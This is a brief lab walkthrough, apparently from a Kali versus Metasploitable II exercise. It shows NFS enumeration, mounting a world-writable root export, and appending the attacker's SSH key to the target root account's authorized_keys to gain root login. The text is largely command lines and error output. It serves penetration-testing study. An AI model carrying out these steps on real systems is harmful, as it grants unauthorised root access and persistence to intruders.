root@ubuntu:~# rpcinfo -p 192.168.99.131
root@ubuntu:~# showmount -e 192.168.99.131
Getting access to a system with a writeable filesystem like this is trivial. To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account's authorized_keys file:
root@ubuntu:~# mkdir /tmp/r00t
root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/
mount.nf: rpc.statd is not running but is required for remote locking.
mount.nfs: Either use '-o nolock' to keep locks local, or start statd.
mount.nfs: an incorrect mount option was specified.
This is the message you get when you try to mount the NFS export.
restarting nfs-common is not enough
- service nfs-common restart
restarting rpc will resolve the issue.
- service rpcbind restart
root@ubuntu:~# cat /root/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys
//with the password generated on the ssh-keygen (then add our pub file -key- into the account's authorized_keys file on the remote machine), you can access to the remote system. yay.
The environment include Kali and Metasploitable II.